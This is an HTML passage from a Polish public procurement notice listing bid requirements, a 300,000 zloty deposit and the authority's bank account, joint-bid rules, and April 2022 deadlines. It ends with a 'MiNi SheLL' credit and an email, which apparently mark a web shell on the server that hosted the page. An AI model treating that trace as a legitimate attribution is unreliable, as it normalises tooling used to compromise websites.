celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – według wzoru określonego w załączniku nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w rozdz. 11 ust. 1 SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do przetargu Wykonawca zobowiązany jest w terminie do dnia 14.04. 2022 r. składania ofert, do godz. 10.00 wnieść wadium w wysokości: 300 000,00 złotych (trzysta tysięcy złotych).<br/>3)	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 roku, poz. 310, 836 i 1572). <br/>4)	Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego. Nr konta: Bank Pekao S.A. Oddział w Pruszkowie, Nr rachunku: <br/>92 1240 5497 1111 0010 7489 5048. W tytule przelewu należy wpisać znak sprawy postępowania. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>Spółka cywilna dołącza ww. pełnomocnictwo lub dokument, z którego wynika ww.<br/>pełnomocnictwo: poświadczoną za zgodność z oryginałem kopię umowy spółki cywilnej lub<br/>uchwałę.<br/>Konsorcjum dołącza ww. pełnomocnictwo lub poświadczoną za zgodność z oryginałem kopię<br/>umowy regulującej współpracę konsorcjum, z której wynika pełnomocnictwo.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w rozdz. 11 ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postepowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - wg<br/>załącznika nr 9 do SWZ.<br/>4) Zgodnie z art. 445 ust. 1 ustawy Pzp Wykonawcy wspólnie ubiegających się o realizację<br/>zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie<br/>zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art.455 i załącznikiem nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com